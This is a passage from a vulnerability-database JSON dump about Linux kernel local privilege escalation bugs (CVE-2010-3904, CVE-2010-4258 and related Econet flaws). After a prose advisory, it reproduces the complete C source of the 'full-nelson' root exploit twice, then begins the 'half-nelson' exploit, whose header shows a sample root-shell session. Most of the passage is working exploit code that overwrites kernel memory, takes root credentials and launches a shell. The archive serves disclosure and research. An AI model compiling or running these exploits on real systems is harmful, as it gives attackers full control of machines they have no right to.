"https://vulners.com/securityvulns/SECURITYVULNS:VULN:11211", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:37", "description": "-----BEGIN PGP 
SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n VSR Security Advisory\r\n http://www.vsecurity.com/\r\n\r\n- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nAdvisory Name: Linux RDS Protocol Local Privilege Escalation\r\n Release Date: 2010-10-19\r\n Application: Linux Kernel\r\n Versions: 2.6.30 - 2.6.36-rc8\r\n Severity: High\r\n Author: Dan Rosenberg < drosenberg (at) vsecurity (dot) com >\r\nVendor Status: Patch Released [3]\r\nCVE Candidate: CVE-2010-3904\r\n Reference: http://www.vsecurity.com/resources/advisory/20101019-1/\r\n\r\n- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\n\r\nProduct Description\r\n- -------------------\r\n- From [1]:\r\n\r\n "Linux is a free Unix-type operating system originally created by Linus\r\n Torvalds with the assistance of developers around the world. Developed under\r\n the GNU General Public License, the source code for Linux is freely available\r\n to everyone."\r\n\r\n- From [2]:\r\n\r\n "Reliable Datagram Sockets (RDS) provide in order, non-duplicating, \r\n highly available, low overhead, reliable delivery of datagrams between \r\n hundreds of thousands of non-connected endpoints."\r\n\r\nVulnerability Overview\r\n- ----------------------\r\nOn October 13th, VSR identified a vulnerability in the RDS protocol, as\r\nimplemented in the Linux kernel. Because kernel functions responsible for\r\ncopying data between kernel and user space failed to verify that a\r\nuser-provided address actually resided in the user segment, a local attacker\r\ncould issue specially crafted socket function calls to write abritrary values\r\ninto kernel memory. 
By leveraging this capability, it is possible for\r\nunprivileged users to escalate privileges to root.\r\n\r\nVulnerability Details\r\n- ---------------------\r\nOn Linux, recvmsg() style socket calls are performed using iovec structs, which\r\nallow a user to specify a base address and size for a buffer used to receive\r\nsocket data. Each packet family is responsible for defining functions that\r\ncopy socket data, which is received by the kernel, back to user space to allow\r\nuser programs to process and handle received network data.\r\n\r\nWhen performing this copying of data to user space, the RDS protocol failed to\r\nverify that the base address of a user-provided iovec struct pointed to a valid\r\nuserspace address before using the __copy_to_user_inatomic() function to copy\r\nthe data. As a result, by providing a kernel address as an iovec base and\r\nissuing a recvmsg() style socket call, a local user could write arbitrary data\r\ninto kernel memory. This can be leveraged to escalate privileges to root.\r\n\r\nProof-of-Concept Exploit\r\n- ------------------------\r\nVSR has developed a proof-of-concept exploit [4] to both demonstrate the\r\nseverity of this issue as well as allow users and administrators to verify the\r\nexistence of the vulnerability. The exploit leverages the ability to write\r\ninto kernel memory to reset the kernel's security operations structure and gain\r\nroot privileges. The exploit requires that kernel symbol resolution is\r\navailable to unprivileged users, via /proc/kallsyms or similar, as is the case\r\non most stock distributions. It has been tested on both 32-bit and 64-bit x86\r\nplatforms. 
While this exploit has been reliable during testing, it is not\r\nadvised to run kernel exploits on production systems, as there is a risk of\r\ncausing system instability and crashing the affected machine.\r\n\r\nVersions Affected\r\n- -----------------\r\nThis vulnerability affects unpatched versions of the Linux kernel, starting\r\nfrom 2.6.30, where the RDS protocol was first included. Installations are only\r\nvulnerable if the CONFIG_RDS kernel configuration option is set, and if there\r\nare no restrictions on unprivileged users loading packet family modules, as is\r\nthe case on most stock distributions.\r\n\r\nVendor Response\r\n- ---------------\r\nThe following timeline details Linux's response to the reported issue.\r\n\r\n2010-10-13 Vulnerability reported to Linux security team\r\n2010-10-13 Response, agreement on disclosure date\r\n2010-10-19 Fix publicly committed [3]\r\n2010-10-19 Coordinated disclosure\r\n\r\nRecommendation\r\n- --------------\r\nUsers should either install updates provided by downstream distributions, or\r\napply the committed patch [3] and recompile their kernel.\r\n\r\nCommon Vulnerabilities and Exposures (CVE) Information\r\n- ------------------------------------------------------\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned\r\nthe number CVE-2010-3904 to this issue. This is a candidates for\r\ninclusion in the CVE list (http://cve.mitre.org), which standardizes\r\nnames for security problems.\r\n\r\nAcknowledgements\r\n- ----------------\r\nThanks to Andrew Morton, Linus Torvalds, Andy Grover, and Eugene Teo for their\r\nprompt responses and patch.\r\n\r\n- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nReferences:\r\n\r\n1. Linux kernel \r\n http://www.linux.org\r\n\r\n2. Reliable Datagram Sockets\r\n http://oss.oracle.com/pipermail/rds-devel/2007-November/000228.html\r\n\r\n3. 
GIT patch \r\n\r\nhttp://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=799c10559d60f159ab2232203f222f18fa3c4a5f\r\n\r\n4. RDS protocol privilege escalation exploit\r\n http://www.vsecurity.com/download/tools/linux-rds-exploit.c\r\n\r\n- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nThis advisory is distributed for educational purposes only with the sincere\r\nhope that it will help promote public safety. This advisory comes with\r\nabsolutely NO WARRANTY; not even the implied warranty of merchantability or\r\nfitness for a particular purpose. Virtual Security Research, LLC nor the author\r\naccepts any liability for any direct, indirect, or consequential loss or damage\r\narising from use of, or reliance on, this information.\r\n\r\nSee the VSR disclosure policy for more information on our responsible\r\ndisclosure practices: http://www.vsecurity.com/company/disclosure\r\n\r\n- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n Copyright 2010 Virtual Security Research, LLC. 
All rights reserved.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAky93O8ACgkQQ1RSUNR+T+gXiwCgkVifvjPHDD+Xf6JrQJ4NisSW\r\nUKEAn0Rh+XhN3kGUne5sCAGFeGln+qM0\r\n=cKv/\r\n-----END PGP SIGNATURE-----", "cvss3": {}, "published": "2010-10-24T00:00:00", "type": "securityvulns", "title": "VSR Advisories: Linux RDS Protocol Local Privilege Escalation", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2010-10-24T00:00:00", "id": "SECURITYVULNS:DOC:24978", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24978", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:33", "description": "proto_ops structure uninitialized pointers.", "cvss3": {}, "published": "2009-08-31T00:00:00", "type": "securityvulns", "title": "Linux kernel uninitialized pointers", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2009-2692"], "modified": "2009-08-31T00:00:00", "id": "SECURITYVULNS:VULN:10150", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10150", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T18:07:08", "description": "No description provided by source.", "cvss3": {}, "published": "2010-12-09T00:00:00", "type": "seebug", "title": "Linux Kernel <= 2.6.37 Local Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-3849", "CVE-2010-3850", "CVE-2010-4258"], "modified": "2010-12-09T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20280", "id": "SSV:20280", "sourceData": "\n /*\r\n * Linux Kernel <= 2.6.37 local privilege escalation\r\n * by Dan Rosenberg\r\n * @djrbliss on twitter\r\n *\r\n * Usage:\r\n * gcc full-nelson.c -o full-nelson\r\n * ./full-nelson\r\n *\r\n * This exploit leverages three vulnerabilities 
to get root, all of which were\r\n * discovered by Nelson Elhage:\r\n *\r\n * CVE-2010-4258\r\n * -------------\r\n * This is the interesting one, and the reason I wrote this exploit. If a\r\n * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL\r\n * word will be written to a user-specified pointer when that thread exits.\r\n * This write is done using put_user(), which ensures the provided destination\r\n * resides in valid userspace by invoking access_ok(). However, Nelson\r\n * discovered that when the kernel performs an address limit override via\r\n * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,\r\n * etc.), this override is not reverted before calling put_user() in the exit\r\n * path, allowing a user to write a NULL word to an arbitrary kernel address.\r\n * Note that this issue requires an additional vulnerability to trigger.\r\n *\r\n * CVE-2010-3849\r\n * -------------\r\n * This is a NULL pointer dereference in the Econet protocol. By itself, it's\r\n * fairly benign as a local denial-of-service. 
It's a perfect candidate to\r\n * trigger the above issue, since it's reachable via sock_no_sendpage(), which\r\n * subsequently calls sendmsg under KERNEL_DS.\r\n *\r\n * CVE-2010-3850\r\n * -------------\r\n * I wouldn't be able to reach the NULL pointer dereference and trigger the\r\n * OOPS if users weren't able to assign Econet addresses to arbitrary\r\n * interfaces due to a missing capabilities check.\r\n *\r\n * In the interest of public safety, this exploit was specifically designed to\r\n * be limited:\r\n *\r\n * * The particular symbols I resolve are not exported on Slackware or Debian\r\n * * Red Hat does not support Econet by default\r\n * * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and\r\n * Debian\r\n *\r\n * However, the important issue, CVE-2010-4258, affects everyone, and it would\r\n * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly\r\n * more sophisticated version of this that doesn't have the roadblocks I put in\r\n * to prevent abuse by script kiddies.\r\n *\r\n * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.\r\n *\r\n * NOTE: the exploit process will deadlock and stay in a zombie state after you\r\n * exit your root shell because the Econet thread OOPSes while holding the\r\n * Econet mutex. It wouldn't be too hard to fix this up, but I didn't bother.\r\n *\r\n * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla\r\n */\r\n \r\n#include <stdio.h>\r\n#include <sys/socket.h>\r\n#include <fcntl.h>\r\n#include <sys/ioctl.h>\r\n#include <string.h>\r\n#include <net/if.h>\r\n#include <sched.h>\r\n#include <stdlib.h>\r\n#include <signal.h>\r\n#include <sys/utsname.h>\r\n#include <sys/mman.h>\r\n#include <unistd.h>\r\n \r\n/* How many bytes should we clear in our\r\n * function pointer to put it into userspace? */\r\n#ifdef __x86_64__\r\n#define SHIFT 24\r\n#define OFFSET 3\r\n#else\r\n#define SHIFT 8\r\n#define OFFSET 1\r\n#endif\r\n \r\n/* thanks spender... 
*/\r\nunsigned long get_kernel_sym(char *name)\r\n{\r\n FILE *f;\r\n unsigned long addr;\r\n char dummy;\r\n char sname[512];\r\n struct utsname ver;\r\n int ret;\r\n int rep = 0;\r\n int oldstyle = 0;\r\n \r\n f = fopen("/proc/kallsyms", "r");\r\n if (f == NULL) {\r\n f = fopen("/proc/ksyms", "r");\r\n if (f == NULL)\r\n goto fallback;\r\n oldstyle = 1;\r\n }\r\n \r\nrepeat:\r\n ret = 0;\r\n while(ret != EOF) {\r\n if (!oldstyle)\r\n ret = fscanf(f, "%p %c %s\\n", (void **)&addr, &dummy, sname);\r\n else {\r\n ret = fscanf(f, "%p %s\\n", (void **)&addr, sname);\r\n if (ret == 2) {\r\n char *p;\r\n if (strstr(sname, "_O/") || strstr(sname, "_S."))\r\n continue;\r\n p = strrchr(sname, '_');\r\n if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {\r\n p = p - 4;\r\n while (p > (char *)sname && *(p - 1) == '_')\r\n p--;\r\n *p = '\\0';\r\n }\r\n }\r\n }\r\n if (ret == 0) {\r\n fscanf(f, "%s\\n", sname);\r\n continue;\r\n }\r\n if (!strcmp(name, sname)) {\r\n fprintf(stdout, " [+] Resolved %s to %p%s\\n", name, (void *)addr, rep ? " (via System.map)" :\r\n"");\r\n fclose(f);\r\n return addr;\r\n }\r\n }\r\n \r\n fclose(f);\r\n if (rep)\r\n return 0;\r\nfallback:\r\n uname(&ver);\r\n if (strncmp(ver.release, "2.6", 3))\r\n oldstyle = 1;\r\n sprintf(sname, "/boot/System.map-%s", ver.release);\r\n f = fopen(sname, "r");\r\n if (f == NULL)\r\n return 0;\r\n rep = 1;\r\n goto repeat;\r\n}\r\n \r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\n \r\nstatic int __attribute__((regparm(3)))\r\ngetroot(void * file, void * vma)\r\n{\r\n \r\n commit_creds(prepare_kernel_cred(0));\r\n return -1;\r\n \r\n}\r\n \r\n/* Why do I do this? 
Because on x86-64, the address of\r\n * commit_creds and prepare_kernel_cred are loaded relative\r\n * to rip, which means I can't just copy the above payload\r\n * into my landing area. */\r\nvoid __attribute__((regparm(3)))\r\ntrampoline()\r\n{\r\n \r\n#ifdef __x86_64__\r\n asm("mov $getroot, %rax; call *%rax;");\r\n#else\r\n asm("mov $getroot, %eax; call *%eax;");\r\n#endif\r\n \r\n}\r\n \r\n/* Triggers a NULL pointer dereference in econet_sendmsg\r\n * via sock_no_sendpage, so it's under KERNEL_DS */\r\nint trigger(int * fildes)\r\n{\r\n int ret;\r\n struct ifreq ifr;\r\n \r\n memset(&ifr, 0, sizeof(ifr));\r\n strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);\r\n \r\n ret = ioctl(fildes[2], SIOCSIFADDR, &ifr);\r\n \r\n if(ret < 0) {\r\n printf("[*] Failed to set Econet address.\\n");\r\n return -1;\r\n }\r\n \r\n splice(fildes[3], NULL, fildes[1], NULL, 128, 0);\r\n splice(fildes[0], NULL, fildes[2], NULL, 128, 0);\r\n \r\n /* Shouldn't get here... */\r\n exit(0);\r\n}\r\n \r\nint main(int argc, char * argv[])\r\n{\r\n unsigned long econet_ops, econet_ioctl, target, landing;\r\n int fildes[4], pid;\r\n void * newstack, * payload;\r\n \r\n /* Create file descriptors now so there are two\r\n references to them after cloning...otherwise\r\n the child will never return because it\r\n deadlocks when trying to unlock various\r\n mutexes after OOPSing */\r\n pipe(fildes);\r\n fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);\r\n fildes[3] = open("/dev/zero", O_RDONLY);\r\n \r\n if(fildes[0] < 0 || fildes[1] < 0 || fildes[2] < 0 || fildes[3] < 0) {\r\n printf("[*] Failed to open file descriptors.\\n");\r\n return -1;\r\n }\r\n \r\n /* Resolve addresses of relevant symbols */\r\n printf("[*] Resolving kernel addresses...\\n");\r\n econet_ioctl = get_kernel_sym("econet_ioctl");\r\n econet_ops = get_kernel_sym("econet_ops");\r\n commit_creds = (_commit_creds) get_kernel_sym("commit_creds");\r\n prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");\r\n 
\r\n if(!econet_ioctl || !commit_creds || !prepare_kernel_cred || !econet_ops) {\r\n printf("[*] Failed to resolve kernel symbols.\\n");\r\n return -1;\r\n }\r\n \r\n if(!(newstack = malloc(65536))) {\r\n printf("[*] Failed to allocate memory.\\n");\r\n return -1;\r\n }\r\n \r\n printf("[*] Calculating target...\\n");\r\n target = econet_ops + 10 * sizeof(void *) - OFFSET;\r\n \r\n /* Clear the higher bits */\r\n landing = econet_ioctl << SHIFT >> SHIFT;\r\n \r\n payload = mmap((void *)(landing & ~0xfff), 2 * 4096,\r\n PROT_READ | PROT_WRITE | PROT_EXEC,\r\n MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);\r\n \r\n if ((long)payload == -1) {\r\n printf("[*] Failed to mmap() at target address.\\n");\r\n return -1;\r\n }\r\n \r\n memcpy((void *)landing, &trampoline, 1024);\r\n \r\n clone((int (*)(void *))trigger,\r\n (void *)((unsigned long)newstack + 65536),\r\n CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,\r\n &fildes, NULL, NULL, target);\r\n \r\n sleep(1);\r\n \r\n printf("[*] Triggering payload...\\n");\r\n ioctl(fildes[2], 0, NULL);\r\n \r\n if(getuid()) {\r\n printf("[*] Exploit failed to get root.\\n");\r\n return -1;\r\n }\r\n \r\n printf("[*] Got root!\\n");\r\n execl("/bin/sh", "/bin/sh", NULL);\r\n}\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20280", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T16:53:37", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "Linux Kernel <= 2.6.37 - Local Privilege Escalation", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-3849", "CVE-2010-3850", "CVE-2010-4258"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-70365", "id": "SSV:70365", "sourceData": "\n /*\r\n * Linux Kernel <= 2.6.37 local privilege escalation\r\n * by Dan Rosenberg\r\n * @djrbliss on twitter\r\n *\r\n * Usage:\r\n * gcc full-nelson.c -o 
full-nelson\r\n * ./full-nelson\r\n *\r\n * This exploit leverages three vulnerabilities to get root, all of which were\r\n * discovered by Nelson Elhage:\r\n *\r\n * CVE-2010-4258\r\n * -------------\r\n * This is the interesting one, and the reason I wrote this exploit. If a\r\n * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL\r\n * word will be written to a user-specified pointer when that thread exits.\r\n * This write is done using put_user(), which ensures the provided destination\r\n * resides in valid userspace by invoking access_ok(). However, Nelson\r\n * discovered that when the kernel performs an address limit override via\r\n * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,\r\n * etc.), this override is not reverted before calling put_user() in the exit\r\n * path, allowing a user to write a NULL word to an arbitrary kernel address.\r\n * Note that this issue requires an additional vulnerability to trigger.\r\n *\r\n * CVE-2010-3849\r\n * -------------\r\n * This is a NULL pointer dereference in the Econet protocol. By itself, it's\r\n * fairly benign as a local denial-of-service. 
It's a perfect candidate to\r\n * trigger the above issue, since it's reachable via sock_no_sendpage(), which\r\n * subsequently calls sendmsg under KERNEL_DS.\r\n *\r\n * CVE-2010-3850\r\n * -------------\r\n * I wouldn't be able to reach the NULL pointer dereference and trigger the\r\n * OOPS if users weren't able to assign Econet addresses to arbitrary\r\n * interfaces due to a missing capabilities check.\r\n *\r\n * In the interest of public safety, this exploit was specifically designed to\r\n * be limited:\r\n *\r\n * * The particular symbols I resolve are not exported on Slackware or Debian\r\n * * Red Hat does not support Econet by default\r\n * * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and\r\n * Debian\r\n *\r\n * However, the important issue, CVE-2010-4258, affects everyone, and it would\r\n * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly\r\n * more sophisticated version of this that doesn't have the roadblocks I put in\r\n * to prevent abuse by script kiddies.\r\n *\r\n * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.\r\n *\r\n * NOTE: the exploit process will deadlock and stay in a zombie state after you\r\n * exit your root shell because the Econet thread OOPSes while holding the\r\n * Econet mutex. It wouldn't be too hard to fix this up, but I didn't bother.\r\n *\r\n * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla\r\n */\r\n\r\n#include <stdio.h>\r\n#include <sys/socket.h>\r\n#include <fcntl.h>\r\n#include <sys/ioctl.h>\r\n#include <string.h>\r\n#include <net/if.h>\r\n#include <sched.h>\r\n#include <stdlib.h>\r\n#include <signal.h>\r\n#include <sys/utsname.h>\r\n#include <sys/mman.h>\r\n#include <unistd.h>\r\n\r\n/* How many bytes should we clear in our\r\n * function pointer to put it into userspace? */\r\n#ifdef __x86_64__\r\n#define SHIFT 24\r\n#define OFFSET 3\r\n#else\r\n#define SHIFT 8\r\n#define OFFSET 1\r\n#endif\r\n\r\n/* thanks spender... 
*/\r\nunsigned long get_kernel_sym(char *name)\r\n{\r\n FILE *f;\r\n unsigned long addr;\r\n char dummy;\r\n char sname[512];\r\n struct utsname ver;\r\n int ret;\r\n int rep = 0;\r\n int oldstyle = 0;\r\n\r\n f = fopen("/proc/kallsyms", "r");\r\n if (f == NULL) {\r\n f = fopen("/proc/ksyms", "r");\r\n if (f == NULL)\r\n goto fallback;\r\n oldstyle = 1;\r\n }\r\n\r\nrepeat:\r\n ret = 0;\r\n while(ret != EOF) {\r\n if (!oldstyle)\r\n ret = fscanf(f, "%p %c %s\\n", (void **)&addr, &dummy, sname);\r\n else {\r\n ret = fscanf(f, "%p %s\\n", (void **)&addr, sname);\r\n if (ret == 2) {\r\n char *p;\r\n if (strstr(sname, "_O/") || strstr(sname, "_S."))\r\n continue;\r\n p = strrchr(sname, '_');\r\n if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {\r\n p = p - 4;\r\n while (p > (char *)sname && *(p - 1) == '_')\r\n p--;\r\n *p = '\\0';\r\n }\r\n }\r\n }\r\n if (ret == 0) {\r\n fscanf(f, "%s\\n", sname);\r\n continue;\r\n }\r\n if (!strcmp(name, sname)) {\r\n fprintf(stdout, " [+] Resolved %s to %p%s\\n", name, (void *)addr, rep ? " (via System.map)" : \r\n"");\r\n fclose(f);\r\n return addr;\r\n }\r\n }\r\n\r\n fclose(f);\r\n if (rep)\r\n return 0;\r\nfallback:\r\n uname(&ver);\r\n if (strncmp(ver.release, "2.6", 3))\r\n oldstyle = 1;\r\n sprintf(sname, "/boot/System.map-%s", ver.release);\r\n f = fopen(sname, "r");\r\n if (f == NULL)\r\n return 0;\r\n rep = 1;\r\n goto repeat;\r\n}\r\n\r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\n\r\nstatic int __attribute__((regparm(3)))\r\ngetroot(void * file, void * vma)\r\n{\r\n\r\n commit_creds(prepare_kernel_cred(0));\r\n return -1;\r\n\r\n}\r\n\r\n/* Why do I do this? 
Because on x86-64, the address of\r\n * commit_creds and prepare_kernel_cred are loaded relative\r\n * to rip, which means I can't just copy the above payload\r\n * into my landing area. */\r\nvoid __attribute__((regparm(3)))\r\ntrampoline()\r\n{\r\n\r\n#ifdef __x86_64__\r\n asm("mov $getroot, %rax; call *%rax;");\r\n#else\r\n asm("mov $getroot, %eax; call *%eax;");\r\n#endif\r\n\r\n}\r\n\r\n/* Triggers a NULL pointer dereference in econet_sendmsg\r\n * via sock_no_sendpage, so it's under KERNEL_DS */\r\nint trigger(int * fildes)\r\n{\r\n int ret;\r\n struct ifreq ifr;\r\n\r\n memset(&ifr, 0, sizeof(ifr));\r\n strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);\r\n\r\n ret = ioctl(fildes[2], SIOCSIFADDR, &ifr);\r\n\r\n if(ret < 0) {\r\n printf("[*] Failed to set Econet address.\\n");\r\n return -1;\r\n }\r\n\r\n splice(fildes[3], NULL, fildes[1], NULL, 128, 0);\r\n splice(fildes[0], NULL, fildes[2], NULL, 128, 0);\r\n\r\n /* Shouldn't get here... */\r\n exit(0);\r\n}\r\n\r\nint main(int argc, char * argv[])\r\n{\r\n unsigned long econet_ops, econet_ioctl, target, landing;\r\n int fildes[4], pid;\r\n void * newstack, * payload;\r\n\r\n /* Create file descriptors now so there are two\r\n references to them after cloning...otherwise\r\n the child will never return because it\r\n deadlocks when trying to unlock various\r\n mutexes after OOPSing */\r\n pipe(fildes);\r\n fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);\r\n fildes[3] = open("/dev/zero", O_RDONLY);\r\n\r\n if(fildes[0] < 0 || fildes[1] < 0 || fildes[2] < 0 || fildes[3] < 0) {\r\n printf("[*] Failed to open file descriptors.\\n");\r\n return -1;\r\n }\r\n\r\n /* Resolve addresses of relevant symbols */\r\n printf("[*] Resolving kernel addresses...\\n");\r\n econet_ioctl = get_kernel_sym("econet_ioctl");\r\n econet_ops = get_kernel_sym("econet_ops");\r\n commit_creds = (_commit_creds) get_kernel_sym("commit_creds");\r\n prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");\r\n\r\n 
if(!econet_ioctl || !commit_creds || !prepare_kernel_cred || !econet_ops) {\r\n printf("[*] Failed to resolve kernel symbols.\\n");\r\n return -1;\r\n }\r\n\r\n if(!(newstack = malloc(65536))) {\r\n printf("[*] Failed to allocate memory.\\n");\r\n return -1;\r\n }\r\n\r\n printf("[*] Calculating target...\\n");\r\n target = econet_ops + 10 * sizeof(void *) - OFFSET;\r\n\r\n /* Clear the higher bits */\r\n landing = econet_ioctl << SHIFT >> SHIFT;\r\n\r\n payload = mmap((void *)(landing & ~0xfff), 2 * 4096,\r\n PROT_READ | PROT_WRITE | PROT_EXEC,\r\n MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);\r\n\r\n if ((long)payload == -1) {\r\n printf("[*] Failed to mmap() at target address.\\n");\r\n return -1;\r\n }\r\n\r\n memcpy((void *)landing, &trampoline, 1024);\r\n\r\n clone((int (*)(void *))trigger,\r\n (void *)((unsigned long)newstack + 65536),\r\n CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,\r\n &fildes, NULL, NULL, target);\r\n\r\n sleep(1);\r\n\r\n printf("[*] Triggering payload...\\n");\r\n ioctl(fildes[2], 0, NULL);\r\n\r\n if(getuid()) {\r\n printf("[*] Exploit failed to get root.\\n");\r\n return -1;\r\n }\r\n\r\n printf("[*] Got root!\\n");\r\n execl("/bin/sh", "/bin/sh", NULL);\r\n}\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-70365", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T17:59:12", "description": "No description provided by source.", "cvss3": {}, "published": "2011-09-09T00:00:00", "title": "Linux Kernel < 2.6.36.2 Econet Privilege Escalation Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-3848", "CVE-2010-3850", "CVE-2010-4073"], "modified": "2011-09-09T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20924", "id": "SSV:20924", "sourceData": "\n /*\r\n * half-nelson.c\r\n *\r\n * Linux Kernel < 2.6.36.2 Econet Privilege Escalation Exploit\r\n * Jon Oberheide <jon@oberheide.org>\r\n * 
http://jon.oberheide.org\r\n *\r\n * Information:\r\n *\r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3848\r\n *\r\n * Stack-based buffer overflow in the econet_sendmsg function in\r\n * net/econet/af_econet.c in the Linux kernel before 2.6.36.2, when an\r\n * econet address is configured, allows local users to gain privileges by\r\n * providing a large number of iovec structures.\r\n *\r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3850\r\n *\r\n * The ec_dev_ioctl function in net/econet/af_econet.c in the Linux kernel\r\n * before 2.6.36.2 does not require the CAP_NET_ADMIN capability, which\r\n * allows local users to bypass intended access restrictions and configure\r\n * econet addresses via an SIOCSIFADDR ioctl call.\r\n *\r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4073\r\n *\r\n * The ipc subsystem in the Linux kernel before 2.6.37-rc1 does not\r\n * initialize certain structures, which allows local users to obtain\r\n * potentially sensitive information from kernel stack memory.\r\n *\r\n * Usage:\r\n *\r\n * $ gcc half-nelson.c -o half-nelson -lrt\r\n * $ ./half-nelson\r\n * [+] looking for symbols...\r\n * [+] resolved symbol commit_creds to 0xffffffff81088ad0\r\n * [+] resolved symbol prepare_kernel_cred to 0xffffffff81088eb0\r\n * [+] resolved symbol ia32_sysret to 0xffffffff81046692\r\n * [+] spawning children to achieve adjacent kstacks...\r\n * [+] found parent kstack at 0xffff88001c6ca000\r\n * [+] found adjacent children kstacks at 0xffff88000d10a000 and 0xffff88000d10c000\r\n * [+] lower child spawning a helper...\r\n * [+] lower child calling compat_sys_wait4 on helper...\r\n * [+] helper going to sleep...\r\n * [+] upper child triggering stack overflow...\r\n * [+] helper woke up\r\n * [+] lower child returned from compat_sys_wait4\r\n * [+] parent's restart_block has been clobbered\r\n * [+] escalating privileges...\r\n * [+] launching root shell!\r\n * # id\r\n * uid=0(root) gid=0(root)\r\n *\r\n 
* Notes:\r\n *\r\n * This exploit leverages three vulnerabilities to escalate privileges.\r\n * The primary vulnerability is a kernel stack overflow, not a stack buffer\r\n * overflow as the CVE description incorrectly states. I believe this is the\r\n * first public exploit for a kernel stack overflow, and it turns out to be\r\n * a bit tricky due to some particulars of the econet vulnerability. A full\r\n * breakdown of the exploit is forthcoming.\r\n *\r\n * Tested on Ubuntu 10.04 LTS (2.6.32-21-generic).\r\n */\r\n \r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <stdint.h>\r\n#include <stddef.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <errno.h>\r\n#include <fcntl.h>\r\n#include <limits.h>\r\n#include <syscall.h>\r\n#include <inttypes.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <sys/wait.h>\r\n#include <sys/ioctl.h>\r\n#include <sys/mman.h>\r\n#include <sys/ipc.h>\r\n#include 